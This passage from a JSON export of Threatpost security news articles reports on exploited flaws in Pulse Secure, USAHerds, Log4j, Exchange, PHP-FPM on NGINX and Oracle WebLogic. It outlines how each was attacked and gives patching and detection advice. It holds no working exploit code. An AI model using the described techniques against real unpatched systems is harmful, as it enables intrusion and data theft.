"2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:21:11", "description": "The Department of Homeland Security (DHS) is urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN.\n\nDHS warns that the Pulse Secure VPN patches may have come too late. Government officials say before the patches were deployed, bad actors were able to compromise Active Directory accounts. So even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAt the heart of the advisory is a known, critical Pulse Secure [arbitrary file reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers to gain access to a victim\u2019s networks. Tracked as CVE-2019-11510, the bug was patched by Pulse Secure in April 2019, and many companies impacted by the flaw issued the fix to address the vulnerability since then.\n\nBut in many cases the damage is already done. Attackers have already exploited the flaw to snatch up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, DHS\u2019 Cybersecurity and Infrastructure Security Agency (CISA) warned in the Thursday alert.\n\n[](<https://register.gotowebinar.com/register/4136632530104301068?source=art>)\n\n\u201cCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510,\u201d according to [CISA\u2019s alert](<https://www.us-cert.gov/ncas/alerts/aa20-107a>). \u201cIf\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.\u201d\n\nThe flaw exists in Pulse Connect Secure, Pulse Secure\u2019s SSL VPN (virtual private network) platform used by various enterprises and organizations. Exploitation of the vulnerability is simple, which is why it received a 10 out of 10 CVSS ranking. Attackers can exploit the flaw to get initial access on the VPN server, where they\u2019re able to access credentials. A proof of concept (PoC) [was made public](<https://www.tenable.com/blog/cve-2019-11510-proof-of-concept-available-for-arbitrary-file-disclosure-in-pulse-connect-secure>) in August 2019. During that time, Troy Mursch with Bad Packets identified [over 14,500 Pulse Secure VPN endpoints that were vulnerable](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) to this flaw. In a more recent scan, [on Jan. 3, 2020](<https://twitter.com/bad_packets/status/1213273678525296640>), Mursch said 3,825 endpoints remain vulnerable.\n\nOne such vulnerable organization was Travelex, which took several months to patch critical vulnerabilities in its seven Pulse Secure VPN servers, according to Bad Packets. Some have speculated the [lag time in patching](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) these VPNs led to the eventual [massive ransomware](<https://threatpost.com/travelex-knocked-offline-malware-attack/151522/>) attack against Travelex.\n\nVarious other cybercriminals have targeted the Pulse Secure VPN flaw to compromise organizations, such as Iranian state sponsored hackers who leveraged the flaw to [conduct cyber-espionage campaigns](<https://www.clearskysec.com/fox-kitten/>) against dozens of companies in Israel.\n\nIn addition to urging organizations update credentials on accounts in Active Directory, which is the database keeps track of all organizations\u2019 user accounts and passwords, CISA has also [released a new tool](<https://github.com/cisagov/check-your-pulse>) to help network admins sniff out any indicators of compromise on their systems that are related to the flaw.\n\n\u201cCISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks,\u201d the advisory said.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n\n**Share this article:**\n\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-04-17T20:56:34", "type": "threatpost", "title": "DHS Urges Pulse Secure VPN Users To Update Passwords", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-17T20:56:34", "id": "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "href": "https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-09T21:12:26", "description": "USAHerds \u2013 an app used ([PDF](<https://www.aphis.usda.gov/traceability/downloads/adt_states/CO.pdf>)) by farmers to speed their response to diseases and other threats to their livestock \u2013 has itself become an infection vector, used to pry open at least six U.S. state networks by one of China\u2019s most prolific state-sponsored espionage groups.\n\nIn a [report](<https://www.mandiant.com/resources/apt41-us-state-governments>) published by Mandiant on Tuesday, researchers described a prolonged incursion conducted by APT41. They detected the activity in May 2021 and tracked it through last month, February 2022, observing the spy group pry open vulnerable, internet-facing web apps that were often written in ASP.NET.\n\n[APT41](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>) \u2013 aka Winnti, Barium, [Wicked Panda](<https://threatpost.com/sidewalk-backdoor-china-espionage-grayfly/169310/>) or Wicked Spider \u2013 is an advanced persistent threat (APT) actor[ known for](<https://threatpost.com/apt41-operatives-indicted-hacking/159324/>) nation state-backed [cyberespionage](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>), [supply-chain hits](<https://www.eset.com/us/about/newsroom/press-releases/eset-dissects-arsenal-of-supply-chain-attacks-by-the-winnti-group/>) and profit-driven cybercrime.\n\n## What\u2019s the Point?\n\nAPT41\u2019s goals are unknown, researchers said, though they\u2019ve observed evidence of the attackers exfiltrating personal identifiable information (PII).\n\n\u201cAlthough the victimology and targeting of PII data is consistent with an espionage operation, Mandiant cannot make a definitive assessment at this time given APT41\u2019s history of moonlighting for personal financial gain,\u201d they wrote.\n\nTher investigations have also revealed a slew of new techniques, malware variants, evasion methods and capabilities.\n\n\u201cIn most of the web application compromises, APT41 conducted .NET deserialization attacks; however, we have also observed APT41 exploiting SQL injection and directory traversal vulnerabilities,\u201d they said.\n\nA deserialization attack is one in which attackers exploit a vulnerability to insert malicious objects into a web app, while \u200b\u200bSQL injection is a type of attack that allows a cyberattacker to interfere with the queries that an application makes to its database.\n\nSQL injection attacks are typically carried out by inserting malicious SQL statements into an entry field used by the website (like a comment field). Directory traversal, aka path traversal, is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\n## Via Logs and a Cow-Tracking App\n\nTo hack into the states\u2019 neworks, the threat actor used a zero-day vulnerability ([CVE-2021-44207](<https://nvd.nist.gov/vuln/detail/CVE-2021-44207>)) in USAHerds (aka the Animal Health Emergency Reporting Diagnostic System), Mandiant reported. In the most recent campaigns, the actor also leveraged the now infamous zero-day in [Log4j](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) (CVE-2021-44228).\n\nThe USAHerd zero day flaw, which Acclaim Systems patched in November 2021, has to do with the app\u2019s use of hard-coded credentials to achieve remote code execution (RCE) on the system that runs it. The app is used in 18 states for animal health management.\n\nMandiant compared the bug to a previously reported vulnerability in Microsoft Exchange Server ([CVE-2020-0688](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>)) \u2013 a bug that was still [under active attack](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) via ProxyShell attacks as of August 2021. The similarity between the two, researchers explained, is that \u201cthe applications used a static validationKey and decryptionKey (collectively known as the machineKey) by default.\u201d\n\nAs a result, all installations of USAHerds shared these values, researchers explained, which is a no-no, being \u201cagainst the best practice of using uniquely generated machineKey values per application instance.\u201d\n\n\u201cGenerating unique machineKey values is critical to the security of an ASP.NET web application because the values are used to secure the integrity of the ViewState,\u201d they cautioned.\n\nMandiant couldn\u2019t figure out how APT41 originally obtained the machineKey values for USAHerds, but once the threat actors got that machineKey, they used it to compromise \u201cany server on the Internet running USAHerds.\u201d\n\nThus, researchers said, there are likely more victims than the six state networks, though they don\u2019t know who or what those victims are.\n\nAs far as APT41\u2019s use of the trio of bugs collectively known as Log4Shell goes, it\u2019s hardly surprising: Within hours of the initial Log4J flaw\u2019s[ public disclosure](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) on Dec. 10, 2021,[ attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and[ unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT), reverse bash shells for future attacks,[ Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors. By January 2022, Mirosoft was observing rampant Log4j [exploit attempts](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) and testing.\n\nLog4Shell exploits cause Java to fetch and deserialize a remote Java object, resulting in potential code execution, Mandiant explained.\n\n\u201cSimilar to their previous web application targeting, APT41 continued to use [YSoSerial](<https://github.com/frohoff/ysoserial>) generated deserialization payloads to perform reconnaissance and deploy backdoors,\u201d according to the report.\n\n\u201cNotably, APT41 deployed a new variant of the[ KEYPLUG](<https://advantage.mandiant.com/malware/malware--4484e24c-fbf7-5894-90e2-4c6ed949ec6c>) backdoor on Linux servers at multiple victims, a malware sub-family we now track as[ KEYPLUG.LINUX](<https://advantage.mandiant.com/malware/malware--e9079969-5b46-5218-9915-3a6ebc566489>). KEYPLUG is a modular backdoor written in C++ that supports multiple network protocols for command and control (C2) traffic including HTTP, TCP, KCP over UDP, and WSS.\u201d\n\nAPT41 \u201cheavily\u201d used the Windows version of the KEYPLUG backdoor at state government victims between June 2021 and December 2021, researchers said. \u201cThus, the deployment of a ported version of the backdoor closely following the state government campaign was significant.\u201d\n\nAfter exploiting Log4Shell, the hackers continued to use deserialization payloads to issue ping commands to domains, researchers said: one of APT41\u2019s favorite techniques, which it used to go after government victims months prior.\n\nAfter the group got access to a targeted environment, \u201cAPT41 performed host and network reconnaissance before deploying KEYPLUG.LINUX to establish a foothold in the environment,\u201d Mandiant said. The cybersecurity firm gave sample commands, shown below, which were used to deploy KEYPLUG.LINUX.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/09154416/Deployment-of-KEYPLUG.LINUX-Following-Log4j-Exploitation-e1646858693371.png>)\n\nDeployment of KEYPLUG.LINUX Following Log4j Exploitation. Source: Mandiant.\n\n## A Swarm of Attacks\n\nIn one incident wherein Mandiant researchers spotted APT41 using SQL injection vulnerability in a proprietary web application to gain access, the attempt was quickly corralled. But two weeks later, the actor came back to compromise the network by exploiting the USAHerds zero day.\n\nThe hackers were coming after state agencies in rapid-fire, repeat attacks, they said. \u201cIn two other instances, Mandiant began an investigation at one state agency only to find that APT41 had also compromised a separate, unrelated agency in the same state,\u201d according to Mandiant.\n\nThe APT was nimble, rapidly shifting to use publicly disclosed vulnerabilities to gain initial access into target networks, while also maintaining existing operations, according to the report.\n\nThe critical Log4J RCE vulnerability is a case in point: Within hours of the Dec. 10 advisory, APT41 began picking it apart. The attackers exploited Log4J to later compromise \u201cat least two U.S. state governments as well as their more traditional targets in the insurance and telecommunications industries,\u201d Mandiant said.\n\n## A Taste for States\n\nThen, late last month, APT41 circled back to re-compromis two previous U.S. state government victims. \u201cOur ongoing investigations show the activity closely aligns with APT41\u2019s May-December 2021 activity, representing a continuation of their campaign into 2022 and demonstrating their unceasing desire to access state government networks,\u201d according to the researchers.\n\nMandiant sketched out a timeline, replicated below, showing the attacks against state government networks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/09151429/APT41_state_government_campaign_timeline-e1646857032834.jpg>)\n\nU.S. state government campaign timeline. Source: Mandiant.\n\n## APT 41 Still Quick on Its Feet\n\nMandiant outlined a catalog of updated tradecraft and new malware that shows that APT41 continues to be nimble, \u201chighly adaptable\u201d and \u201cresourceful.\u201d\n\n\u201cAPT41\u2019s recent activity against U.S. state governments consists of significant new capabilities, from new attack vectors to post-compromise tools and techniques,\u201d researchers concluded.\n\n\u201cAPT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability. The group also demonstrates a willingness to retool and deploy capabilities through new attack vectors as opposed to holding onto them for future use,\u201d the researchers said.\n\nExploiting Log4J in close proximity to the USAHerds campaign is a case in point: it showed that the group\u2019s flexible when it comes to targeting U.S state governments \u201cthrough both cultivated and co-opted attack vectors,\u201d Mandiant said.\n\nSo much for the U.S. [indictment](<https://threatpost.com/apt41-operatives-indicted-hacking/159324/>) of five alleged APT41 members in September 2020: a grand jury move that was as easy for the group to hop over as a flattened cow patty.\n\n\u201cThe scope and sophistication of the crimes in these unsealed indictments is unprecedented. The alleged criminal scheme used actors in China and Malaysia to illegally hack, intrude and steal information from victims worldwide,\u201d said Michael Sherwin, acting U.S. attorney for the District of Columbia,[ in a DoJ statement](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) accompanying the Federal grand jury\u2019s 2020 indictment. \u201cAs set forth in the charging documents, some of these criminal actors believed their association with the PRC provided them free license to hack and steal across the globe.\u201d\n\nSeventeen months later, that still sounds about right to Mandiant: \u201cAPT41 continues to be undeterred,\u201d in spite of whatever the U.S. Department of Justice cares to throw in its path, researchers said.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T21:10:20", "type": "threatpost", "title": "APT41 Spies Broke Into 6 US State Networks via a Livestock App", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2021-44207", "CVE-2021-44228"], "modified": "2022-03-09T21:10:20", "id": "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "href": "https://threatpost.com/apt41-spies-broke-into-6-us-state-networks-via-livestock-app/178838/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:21:46", "description": "Over 80 percent of exposed Exchange servers are still vulnerable to a severe vulnerability \u2013 nearly two months after the flaw was patched, and after researchers warned that multiple threat groups were exploiting it.\n\nThe vulnerability in question ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) exists in the control panel of Exchange, Microsoft\u2019s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, opens servers up to authenticated attackers, who could execute code remotely on them with system privileges.\n\nResearchers recently used Project Sonar, a scanning tool, to analyze internet-facing Exchange servers and sniff out which were vulnerable to the flaw. Out of 433,464 internet-facing Exchange servers observed, at least 357,629 were vulnerable (as of March 24).\n\n[](<https://threatpost.com/newsletter-sign/>)\u201cIf your organization is using Exchange and you aren\u2019t sure whether it has been updated, we strongly urge you to skip to the Taking Action section immediately,\u201d said Tom Sellers, manager of the Rapid7 Labs team, in a [Monday analysis](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>).\n\nWhile the flaw was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates, researchers warned [in a March advisory](<https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/>) that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors. Attacks [first started late February](<https://www.tenable.com/blog/cve-2020-0688-microsoft-exchange-server-static-key-flaw-could-lead-to-remote-code-execution?utm_source=charge&utm_medium=social&utm_campaign=internal-comms>) and targeted \u201cnumerous affected organizations,\u201d researchers said. They observed attackers leverage the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks post-exploitation.\n\nBrian Gorenc, director of vulnerability research and head of Trend Micro\u2019s ZDI program (which was credited with discovered the flaw) told [Threatpost via email](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that while the vulnerability was labelled \u201cimportant\u201d in severity by Microsoft, researchers opine it should be treated as \u201ccritical.\u201d\n\n\u201cThat\u2019s why we worked with Microsoft to get it patched through coordinated disclosure, and it\u2019s why we provided defenders detailed information about it through our blog,\u201d he said. \u201cWe felt Exchange administrators should treat this as a Critical patch rather than Important as labelled by Microsoft. We encourage everyone to apply the patch as soon as possible to protect themselves from this vulnerability.\u201d\n\nThe patch management issues with Exchange servers extend beyond CVE-2020-0688. Sellers said his investigation revealed that over 31,000 Exchange 2010 servers have not been updated since 2012. And, there are nearly 800 Exchange 2010 servers that have never been updated, he said.\n\nSellers urged admins to verify that an update has been deployed. He also said users can determine whether anyone has attempted to exploit the vulnerability in their environment: \u201cSince exploitation requires a valid Exchange user account, any account tied to these attempts should be treated as compromised,\u201d Sellers said.\n\n> If your org uses Microsoft Exchange I *strongly* recommend you make sure the patch for CVE-2020-0688 (Feb 11) is installed.\n> \n> Unpatched means phished user = SYSTEM on OWA servers.[@Rapid7](<https://twitter.com/rapid7?ref_src=twsrc%5Etfw>) Project Sonar found at least 357,629 unpatched hosts.\n> \n> Blog post: <https://t.co/DclWb3T0mZ>\n> \n> \u2014 Tom Sellers (@TomSellers) [April 6, 2020](<https://twitter.com/TomSellers/status/1247215382773018624?ref_src=twsrc%5Etfw>)\n\n\u201cThe most important step is to determine whether Exchange has been updated,\u201d Sellers said. \u201cThe update for CVE-2020-0688 needs to be installed on any server with the Exchange Control Panel (ECP) enabled. This will typically be servers with the Client Access Server (CAS) role, which is where your users would access Outlook Web App (OWA).\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-07T21:19:15", "type": "threatpost", "title": "Serious Exchange Flaw Still Plagues 350K Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-07T21:19:15", "id": "THREATPOST:DF7C78725F19B2637603E423E56656D4", "href": "https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-06T21:57:01", "description": "A buffer underflow bug in PHP could allow remote code-execution (RCE) on targeted NGINX servers.\n\nFirst discovered during a hCorem Capture the Flag competition in September, the bug (CVE-2019-11043) exists in the FastCGI directive used in some PHP implementations on NGINX servers, according to researchers at Wallarm.\n\nPHP powers about 30 percent of modern websites, including popular web platforms like WordPress and Drupal \u2013 but NGINX servers are only vulnerable if they have PHP-FPM enabled (a non-default optimization feature that allows servers to execute scripts faster). The issue [is patched](<https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest>) in PHP versions 7.3.11, 7.2.24 and 7.1.33, which were released last week.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn a [Monday posting](<https://github.com/search?q=fastcgi_split_path&type=Code>), Wallarm researchers said that the bug can be exploited by sending specially crafted packets to the server by using the \u201cfastcgi_split_path\u201d directive in the NGINX configuration file. That file is configured to process user data, such as a URL. If an attacker creates a special URL that includes a \u201c%0a\u201d (newline) byte, the server will send back more data than it should, which confuses the FastCGI mechanism.\n\n\u201cIn particular, [the bug can be exploited] in a fastcgi_split_path directive and a regexp trick with newlines,\u201d according to Wallarm security researcher Andrew Danau, who found the bug. \u201cBecause of %0a character, NGINX will set an empty value to this variable, and fastcgi+PHP will not expect this\u2026.[as a result], it\u2019s possible to put [in] arbitrary FastCGI variables, like PHP_VALUE.\u201d\n\nAnother security researcher participating in the CTF exercise, Emil Lerner, offered more details in the [PHP bug tracker](<https://bugs.php.net/bug.php?id=78599>): \u201cThe regexp in `fastcgi_split_path_info` directive can be broken using the newline character (in encoded form, %0a). Broken regexp leads to empty PATH_INFO, which triggers the bug,\u201d he said.\n\nLerner [posted a zero-day proof-of-concept](<https://github.com/neex/phuip-fpizdam/>) exploit for the flaw that works in PHP 7 to allow code execution. The exploit makes use of an optimization used for storing FastCGI variables, _fcgi_data_seg.\n\n\u201cUsually, that sort of [buffer underflow] response is related to memory-corruption attacks and we expected to see an attack on the type of information disclosure,\u201d Wallarm researchers said. \u201cInformation disclosure is bad enough as it can result in leaking sensitive or financial data. Even worse, from time to time, although quite rarely, such behavior can indicate a remote code-execution vulnerability.\u201d\n\nResearchers added that without patching, this issue can be a dangerous entry point into web applications given the trivial nature of mounting an exploit.\n\nAdmins can identify vulnerable FastCGI directives in their NGINX configurations with a bash command, \u201cegrep -Rin \u2013color \u2018fastcgi_split_path\u2019 /etc/nginx/,\u201d according to Wallarm.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-28T16:18:11", "type": "threatpost", "title": "PHP Bug Allows Remote Code-Execution on NGINX Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11043", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-28T16:18:11", "id": "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "href": "https://threatpost.com/php-bug-rce-nginx-servers/149593/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:46", "description": "UPDATE\n\nA variant of the Muhstik botnet has been uncovered in the wild, exploiting a recently-disclosed, dangerous vulnerability in Oracle WebLogic servers.\n\nThe newfound samples of Muhstik are targeting the [recently-patched CVE-2019-2725](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) in WebLogic servers, and then launching distributed-denial-of-service (DDoS) and cryptojacking attacks with the aim of making money for the attacker behind the botnet, researchers said.\n\n\u201cFrom the timeline, we can see that the developer of Muhstik watches aggressively for new Linux service vulnerability exploits and takes immediate action to [incorporate] exploits against them into the botnet,\u201d Cong Zheng and Yanhui Jia, researchers with Palo Alto Network\u2019s Unit 42 team, said in a [Tuesday analysis](<https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/>). \u201cThis makes sense, because the faster the botnet includes the new exploits, the greater chance of successfully using the vulnerability to harvest more bots before systems are patched.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOracle WebLogic is a popular server used for building and deploying enterprise applications. The server\u2019s flaw ([CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>)), meanwhile, has a CVSS score of 9.8 and is a remote code-execution (RCE) bug that is exploitable without authentication. Oracle patched the flaw on April 26.\n\nHowever, researchers first observed exploit traffic for the WebLogic vulnerability coming from three new Muhstik samples on April 28. Muhstik, which has been around since March 2018 and has wormlike self-propagating capabilities, is known to compromise Linux servers and IoT devices, and then launch cryptocurrency mining software and DDoS attacks.\n\nThey saw the exploit traffic being sent from the IP address 165.227.78[.]159, which was transmitting one shell command, to download a PHP webshell.\n\nInterestingly, that IP address (165.227.78[.]159) has previously been used by the Muhstik botnet as a mere reporting server to collect information on bots \u2013 but now, the IP address appears to also be used as a payload host server.\n\nThe discovery shows that new samples of the Muhstik botnet continue to sniff out ripe exploits. The botnet had previously targeted an earlier WebLogic vulnerability ([CVE-2017-10271](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271>)), as well as WordPress and [Drupal vulnerabilities.](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)\n\nUnit 42 researchers told Threatpost that they didn\u2019t have further information on the number of servers impacted.\n\n## Oracle WebLogic\n\nThe latest Oracle WebLogic flaw, which impacts versions 10.3.6 and 12.1.3 of the server, is one such ripe target.\n\nThe flaw could allow an attacker to send a request to a WebLogic server, which would then reach out to a malicious host to complete the request, opening up the impacted server to an remote code-execution attack.\n\nOracle for its part is urging users to update as soon as possible. \u201cDue to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible,\u201d Eric Maurice, director of security assurance at Oracle, said in a [recent post](<https://blogs.oracle.com/security/security-alert-cve-2019-2725-released>) about the vulnerability.\n\nOracle didn\u2019t respond to a request for further comment from Threatpost.\n\nHowever, servers that haven\u2019t yet updated are being targeted by several other bad actors, including ones spreading a new [ransomware variant](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) uncovered this week called \u201cSodinokibi.\u201d That ransomware first came onto researchers\u2019 radar on April 25 (the day before a patch was released), after attackers attempted to make an HTTP connection with vulnerable Oracle WebLogic servers.\n\nResearchers for their part warn of a slew of scans checking for the Oracle WebLogic vulnerability, and urge users to update their devices as soon as possible.\n\nhttps://twitter.com/bad_packets/status/1122356384849248258\n\nWhen it comes to Muhstik, Unit 42 researchers said that adding this latest exploit to the botnet\u2019s toolkit will increase the number of systems it can infect.\n\n\u201cThe Oracle WebLogic wls9-async RCE vulnerability is now being used by Muhstik botnet in the wild and there is a great possibility that it will be exploited by other malware families in the future,\u201d they said. \u201cUnder the pressure of racing with botnets, both service vendors and users should address new vulnerabilities by releasing patches and installing them respectively.\u201d\n\n_This article was updated on May 2 at 8 am ET to reflect Unit 42 comments._\n", "cvss3": {}, "published": "2019-05-01T14:11:11", "type": "threatpost", "title": "Muhstik Botnet Variant Targets Just-Patched Oracle WebLogic Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725", "CVE-2020-0688"], "modified": "2019-05-01T14:11:11", "id": "THREATPOST:420EE567E806D93092741D7BB375AC57", "href": "https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:23:09", "description": "Multiple threat groups are actively exploiting a vulnerability in Microsoft Exchange servers, researchers warn. If left unpatched, the flaw allows authenticated attackers to execute code remotely with system privileges.\n\nThe vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft\u2019s mail server and calendaring server, and was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates. However, researchers [in a Friday advisory](<https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/>) said that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors.\n\n\u201cWhat we have seen thus far are multiple Chinese APT group exploiting or attempting to exploit this flaw,\u201d Steven Adair, founder and president of Volexity, told Threatpost. \u201cHowever, I think it is safe to say that this exploit is now in the hands of operators around the world and unfortunately some companies that have not patched yet or did not patch quickly enough are likely to pay the price.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttacks first started late February and targeted \u201cnumerous affected organizations,\u201d researchers said. They observed attackers leverage the 